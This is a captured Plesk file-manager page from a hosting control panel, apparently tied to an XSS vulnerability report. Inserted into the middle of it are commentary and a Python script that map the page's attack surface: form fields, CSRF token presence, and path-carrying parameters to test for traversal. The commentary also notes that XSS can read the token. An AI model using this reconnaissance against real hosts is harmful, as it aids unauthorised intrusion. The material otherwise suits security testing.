items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>File Manager</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/filemanager/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/hosting/file-manager/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;


           function update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "update";
               lsubmit(f);

               return false;
           }

           function chmod_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "chmod";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function rename_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "rename";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function new_file_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_file";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-file/"
               lsubmit(f);

               return false;
           }

           function count_size_oC()
           {
               f = document.forms[0];
               f.cmd.value = "count_size";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function extract_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "extract";
               f.subcmd.value = "";
               lsubmit(f);
               return false;
           }

           function pack_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/pack/"
               lsubmit(f);

               return false;
           }

           function create_archive_oC() {
               f = document.forms[0];

               if ("" == f.archive_name.value) {
                   alert("Please enter file name.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "pack";
               lsubmit(f);

               return false;
           }

           function new_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_dir";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-dir/"
               lsubmit(f);

               return false;
           }

           function create_file_oC()
           {
               f = document.forms[0];
errorfield(f.new_file, false);

               if (f.create_file_method[0].checked) { // upload
                   f.cmd.value = "upload_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               if (f.create_file_method[1].checked) { // create
                   if (f.new_file.value == "") {
        errorfield(f.new_file, true);
                       alert("Some fields are empty or contain an improper value.");
                       f.new_file.focus();
                       return false;
                   }

                   f.cmd.value = "create_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               return false;
           }

           function create_file_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_file";
               f.subcmd.value = "save";
               lsubmit(f);

               return false;
           }

           function create_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_dir";
               f.file.value = f.new_dir.value;
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function edit_reset_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "";
               f.reset();
               return false;
           }

           function edit_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save";
               lsubmit(f);
               return false;
           }

           function edit_save_exit_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save_exit";
               lsubmit(f);
               return false;
           }

           function codepage_oC()
           {
               f = document.forms[0];
               f.subcmd.value = "codepage";
               lsubmit(f);
               return false;
           }

           function cancel_oC()
           {
               f = document.forms[0];
               f.cmd.value = "";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/"
               lsubmit(f);
               return false;
           }

           function touch_oC()
           {
               f = document.forms[0];

               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               if (!confirm("Are you sure you want to change the timestamp of the selected files?"))
                   return false;

               f.cmd.value="touch";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function copy_move_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="copy_move";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/copy-move/"
               lsubmit(f);

               return false;
           }

           function copy_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "copy";
               lsubmit(f);

               return false;
           }

           function move_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "move";
               lsubmit(f);

               return false;
           }

           function remove_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/remove/"
               lsubmit(f);

               return false;
           }

           function remove_submit_oC()
           {
               f = document.forms[0];
               if (!f.confirm.checked) {
                   alert("You must confirm deletion.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function check_selection()
           {
               f = document.forms[0];
               selected = 0;
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]") && f.elements[i].checked) {
                       selected++;
                   }
               }
               return selected;
           }

           function perm_click(t, id) {
               el = document.forms[0].elements;
               switch (t) {
               case "ra":
                   if (el["ra_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["wa_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "rd":
                   if (el["rd_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["wd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "wa":
                   if (el["wa_perm[" + id + "]"].checked) {
                       el["wd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "wd":
                   if (el["wd_perm[" + id + "]"].checked) {
                       el["wa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "xa":
                   if (el["xa_perm[" + id + "]"].checked) {
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["wa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "xd":
                   if (el["xd_perm[" + id + "]"].checked) {
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["wd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "fa":
                   if (el["fa_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = true;
                       el["wa_perm[" + id + "]"].checked = true;
                       el["xa_perm[" + id + "]"].checked = true;
                       el["rd_perm[" + id + "]"].checked = false;
                       el["wd_perm[" + id + "]"].checked = false;
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                   }
                   break;
               case "fd":
                   if (el["fd_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = true;
                       el["wd_perm[" + id + "]"].checked = true;
                       el["xd_perm[" + id + "]"].checked = true;
                       el["ra_perm[" + id + "]"].checked = false;
                       el["wa_perm[" + id + "]"].checked = false;
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                   }
                   break;

               }
           }
       
</script>
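The inline JavaScript above shows how the file manager is driven: every button writes a `cmd`/`subcmd` pair into hidden fields of `document.forms[0]`, sometimes swaps `f.action` to a different `file-manager/*` endpoint, and then calls `lsubmit(f)`; the form that follows is a multipart POST carrying a `forgery_protection_token`, and the directory listing links pass `cmd=`/`file=` and, for the permissions page, an absolute server path in `fname=`. The script below is an added example (not code from the XSS.CX report or from Parallels/Plesk) that pulls exactly that attack surface out of a captured response body so a tester can see at a glance which parameters reach the server, whether the state-changing form is token-protected, and which GET parameters carry filesystem paths. `SAMPLE` is a constructed excerpt modelled on this dump (same field names, endpoints and token value) with the report's `vulnerable.host.fqdn` placeholder in the vhost path; the regexes and function names are this example's own.

```python
"""Attack-surface enumeration for a captured Plesk file-manager response.

Added example, not code from the XSS.CX report or from Parallels/Plesk.
Given a response body like the dump above it reports: the POST form and its
submittable fields (is forgery_protection_token present?), GET links grouped
by endpoint and parameter, parameters carrying absolute filesystem paths, and
the cmd/subcmd values and action URLs the inline JavaScript writes before lsubmit(f).
"""
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed excerpt modelled on the captured page (same field names, endpoints
# and token value); the vhost path uses the report's vulnerable.host.fqdn
# placeholder rather than a real host name.
SAMPLE = """
<script type="text/javascript">
function copy_move_oC() { f = document.forms[0]; f.cmd.value="copy_move"; f.subcmd.value = ""; f.action = "/plesk/client@2/domain@1/hosting/file-manager/copy-move/"; lsubmit(f); return false; }
function edit_save_oC() { f = document.forms[0]; f.cmd.value = "edit"; f.subcmd.value = "save"; lsubmit(f); return false; }
</script>
<form action="/plesk/client@2/domain@1/hosting/file-manager/edit/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="bdaafe67daaa200e2f077bd9577b09f4">
   <input type="hidden" name="cmd" value="">
   <input type="hidden" name="wizaction">
<input type="text" name="filter" id="searchInput" value="" size="20" maxlength="245">
<A href="#" onClick="FileListSetPageSize(10); return false;">10</a>
<input type="checkbox" class="checkbox" name="del[]" id="del_anon_ftp" value="anon_ftp">
<A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fanon_ftp%2F">anon_ftp</a>
<A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=anon_ftp">rename</a>
<A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fvulnerable.host.fqdn%2Fanon_ftp">perms</a>
</form>
"""


class SurfaceParser(HTMLParser):
    """Collect forms with their submittable fields, and every parameterised link."""

    def __init__(self):
        super().__init__()
        self.forms, self.links, self._form = [], [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # names are lower-cased, values already unescaped (&amp; -> &)
        if tag == "form":
            self._form = {"action": a.get("action", ""), "method": a.get("method", "get").lower(),
                          "enctype": a.get("enctype", "application/x-www-form-urlencoded"), "fields": {}}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None and a.get("name"):
            if "disabled" not in a:  # disabled controls are never submitted, so they are not surface
                self._form["fields"][a["name"]] = {"type": a.get("type", "text"), "value": a.get("value")}
        elif tag == "a" and a.get("href") and not a["href"].startswith("#"):
            u = urlsplit(a["href"])
            self.links.append({"path": u.path, "params": {k: v[0] for k, v in parse_qs(u.query).items()}})

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def enumerate_surface(body):
    p = SurfaceParser()
    p.feed(body)
    p.close()
    return {"forms": p.forms, "links": p.links}


def csrf_findings(forms, token_field="forgery_protection_token"):
    """One entry per form; a POST form without a non-empty token is the CSRF gap to test."""
    return [{"action": f["action"], "method": f["method"],
             "token": bool(f["fields"].get(token_field, {}).get("value"))} for f in forms]


def params_by_endpoint(links):
    """Map each endpoint path to the set of GET parameter names seen on it."""
    out = {}
    for link in links:
        out.setdefault(link["path"], set()).update(link["params"])
    return out


WIN_ABS_PATH = re.compile(r"^[A-Za-z]:[\\/]")  # Windows build; a Linux build would also need ^/


def path_like_params(links):
    """(endpoint, param, value) for GET parameters carrying an absolute filesystem path:
    the first inputs to test for traversal and for missing ownership checks."""
    return [(l["path"], k, v) for l in links for k, v in l["params"].items() if WIN_ABS_PATH.match(v)]


CMD_RE = re.compile(r'f\.(cmd|subcmd)\.value\s*=\s*"([^"]*)"')
ACTION_RE = re.compile(r'f\.action\s*=\s*"([^"]+)"')


def command_surface(body):
    """Server-side commands the inline JS can send: cmd/subcmd values and action URLs."""
    cmds, subcmds = set(), set()
    for kind, val in CMD_RE.findall(body):
        if val:
            (cmds if kind == "cmd" else subcmds).add(val)
    return {"cmd": sorted(cmds), "subcmd": sorted(subcmds), "actions": sorted(set(ACTION_RE.findall(body)))}


if __name__ == "__main__":
    surface = enumerate_surface(SAMPLE)
    print("forms:", csrf_findings(surface["forms"]))
    print("endpoints:", params_by_endpoint(surface["links"]))
    print("path params:", path_like_params(surface["links"]))
    print("commands:", command_surface(SAMPLE))
```

Run against the real dump instead of `SAMPLE`, the `cmd` list is the full set of file-manager verbs the JS above can emit (update, chmod, rename, new_file, count_size, extract, pack, new_dir, upload_file, create_file, create_dir, edit, touch, copy_move, remove). Two caveats worth keeping in mind when reading the output: the presence of `forgery_protection_token` only defends against cross-site forgery, since any script running in the page's own origin, which is what a reflected XSS gives an attacker, can read the token out of the DOM and submit the form itself; and a parameter like `fname` that carries an absolute server path is an observation about the request surface, not by itself evidence that the server fails to check ownership of that path.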

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/file-manager/edit/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="bdaafe67daaa200e2f077bd9577b09f4">
   <input type="hidden" name="cmd" value="">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   


<div class="toolsArea">
   <fieldset>
       <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div class="screenButtons">
           <SPAN class="commonButton" id="bid-create-dir-disabled" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Cannot create a folder in this folder.&quot;&#125;]);" onMouseOut="tooltip.hide();" style=""><BUTTON name="bname_create_dir" disabled id="buttonid-create-dir-disabled" type="button">Add New Directory</BUTTON><SPAN id="spanid-create-dir-disabled">Add New Directory</SPAN></SPAN>
           <SPAN class="commonButton" id="bid-create-file-disabled" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Cannot create a file in this folder.&quot;&#125;]);" onMouseOut="tooltip.hide();" style=""><BUTTON name="bname_create_file" disabled id="buttonid-create-file-disabled" type="button">Add New File</BUTTON><SPAN id="spanid-create-file-disabled">Add New File</SPAN></SPAN>
       </div>
       
   </td></tr></table></fieldset>
</div>

<div class="listArea">
   <fieldset>
       <legend>Files</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       
       <script>
           function a(event) { tooltip.set(event, [{"type":"string","string":"Edit the file."}]); }
           function b(event) { tooltip.set(event, [{"type":"string","string":"View the file."}]); }
           function c(event) { tooltip.set(event, [{"type":"string","string":"i_filemanager__chdir"}]); }
           function d(event) { tooltip.set(event, [{"type":"string","string":"Change access rights to the file or directory."}]); }
           function e(event) { tooltip.set(event, [{"type":"string","string":"Change the file or directory name."}]); }
           function f(event, type) {
               switch (type) {
                   case "pdir":
                       tooltip.set(event, [{"type":"string","string":"Go to the directory one level up."}]);
                       break;
                   case "dir":
                       tooltip.set(event, [{"type":"string","string":"Go inside the directory."}]);
                       break;
                   case "text":
                       tooltip.set(event, [{"type":"string","string":"View the text file contents."}]);
                       break;
                   case "image":
                       tooltip.set(event, [{"type":"string","string":"View the image."}]);
                       break;
                   case "audio":
                       tooltip.set(event, [{"type":"string","string":"Audio file."}]);
                       break;
                   case "security":
                       tooltip.set(event, [{"type":"string","string":"Apache security file."}]);
                       break;
                   case "webscript":
                       tooltip.set(event, [{"type":"string","string":"Webscript page file."}]);
                       break;
                   case "wappage":
                       tooltip.set(event, [{"type":"string","string":"WAP page file."}]);
                       break;
                   case "webpage":
                       tooltip.set(event, [{"type":"string","string":"Web page file."}]);
                       break;
                   case "compressed":
                       tooltip.set(event, [{"type":"string","string":"Compressed file."}]);
                       break;
                   case "unknown_text":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (text data)."}]);
                       break;
                   case "unknown_binary":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (binary data)."}]);
                       break;
               }
           }
           function g(event) { tooltip.set(event, [{"type":"string","string":"Edit the file in a visual editor."}]); }
           function h(event) { tooltip.set(event, [{"type":"string","string":"Editing the file in a visual editor requires Internet Explorer version 5.5 or later."}]); }
           function i(event) { tooltip.set(event, [{"type":"string","string":"Open the file in a browser."}]); }
           function download_hint(event) { tooltip.set(event, [{"type":"string","string":"Download the file."}]); }
           function z() { tooltip.hide(); }

           function bin() { return confirm("This file may be a binary file. Do you want to open it?"); }
       </script>
       <div id="FileListSearch" class="actions-box show"><table width="100%" cellspacing="0" class="buttons"><tr><td class="main"><div><DIV class="commonButton" id="bid-remove-selected" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Delete the selected files or directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);remove_oC();return false;" style=""><BUTTON name="bname_remove_selected" id="buttonid-remove-selected" type="button" onClick="Event.stop(event);remove_oC();return false;">Remove</BUTTON><SPAN id="spanid-remove-selected">Remove</SPAN></DIV><DIV class="commonButton" id="bid-touch" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to change the timestamp.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);touch_oC();return false;" style=""><BUTTON name="bname_touch" id="buttonid-touch" type="button" onClick="Event.stop(event);touch_oC();return false;">Change Timestamp</BUTTON><SPAN id="spanid-touch">Change Timestamp</SPAN></DIV><DIV class="commonButton" id="bid-copy-move" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to copy or move to another directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);copy_move_oC();return false;" style=""><BUTTON name="bname_copy_move" id="buttonid-copy-move" type="button" onClick="Event.stop(event);copy_move_oC();return false;">Copy/Move</BUTTON><SPAN id="spanid-copy-move">Copy/Move</SPAN></DIV><DIV class="commonButton" id="bid-count-size" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Calculate the total size of selected files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);count_size_oC();return 
false;" style=""><BUTTON name="bname_count_size" id="buttonid-count-size" type="button" onClick="Event.stop(event);count_size_oC();return false;">Calculate Size</BUTTON><SPAN id="spanid-count-size">Calculate Size</SPAN></DIV><DIV class="commonButton" id="bid-extract-archive" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Extract files from the selected archives into the current directory. Note that the file names may be displayed improperly after the extraction if they contain national characters.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);extract_oC();return false;" style=""><BUTTON name="bname_extract_archive" id="buttonid-extract-archive" type="button" onClick="Event.stop(event);extract_oC();return false;">Extract Files</BUTTON><SPAN id="spanid-extract-archive">Extract Files</SPAN></DIV></div></td><td class="misc"><div id="FileListSearchControl" class="show"><DIV class="commonButton" id="bid-search-show" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to show search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchShow();;return false;" style=""><BUTTON name="bname_search_show" id="buttonid-search-show" type="button" onClick="Event.stop(event);FileListSearchShow();;return false;">Show Search</BUTTON><SPAN id="spanid-search-show">Show Search</SPAN></DIV><DIV class="commonButton" id="bid-search-hide" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to hide search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchHide();;return false;" style=""><BUTTON name="bname_search_hide" id="buttonid-search-hide" type="button" onClick="Event.stop(event);FileListSearchHide();;return false;">Hide Search</BUTTON><SPAN id="spanid-search-hide">Hide Search</SPAN></DIV></div></td></tr></table><table 
width="100%" cellspacing="0" class="searchArea buttons"><tr><td class="main"><div><TABLE cellspacing="0" class="searchSimple"><TR><TD><input type="text" name="filter" id="searchInput" value="" size="20" maxlength="245"></TD><TD><DIV class="commonButton" id="bid-search" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Enter a search pattern and click to find files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;" style=""><BUTTON name="bname_search" id="buttonid-search" type="submit" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;">Search</BUTTON><SPAN id="spanid-search">Search</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-show-all" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Show all files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;" style=""><BUTTON name="bname_show_all" id="buttonid-show-all" type="button" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;">Reset Search</BUTTON><SPAN id="spanid-show-all">Reset Search</SPAN></DIV></TD></TR></TABLE></div></td></tr></table></div><div class="paging pagingTop"><input type="hidden" name="page" value ="0"><input type="hidden" name="page_size" value ="25"><table width="100%"><tr><td>11 <A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> items total</td><td align="center"></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" 
id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><input type="hidden" name="sort" value="name"><table width="100%" cellspacing="0" class="list"><TR><th width="0" class="select"><input type="checkbox" class="checkbox" name="FileListSelectAll" value="true" onClick="FileListSelect()"></th><th class="icon"><A href="#" onClick="FileListSort(&#039;type&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by type.&quot;&#125;]);" onMouseOut="tooltip.hide();">T</a></th><th width="65%" class="sort"><A href="#" onClick="FileListSort(&#039;name_reverse&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by name.&quot;&#125;]);" onMouseOut="tooltip.hide();">Name</a><img src="/skins/default/plesk/icons/arrow_up.gif"></th><th width="15%" class="number"><A href="#" onClick="FileListSort(&#039;size&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by size.&quot;&#125;]);" onMouseOut="tooltip.hide();">Size</a></th><th width="20%" class="number"><A href="#" onClick="FileListSort(&#039;ch_date&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by modification date.&quot;&#125;]);" onMouseOut="tooltip.hide();">Modification date</a></th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th></TR><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var 
inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_anon_ftp" value="anon_ftp" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fanon_ftp%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fanon_ftp%2F" onClick=";lon();">anon_ftp</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=anon_ftp" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fanon_ftp" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" 
class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_cgi-bin" value="cgi-bin" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fcgi-bin%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fcgi-bin%2F" onClick=";lon();">cgi-bin</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=cgi-bin" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fcgi-bin" 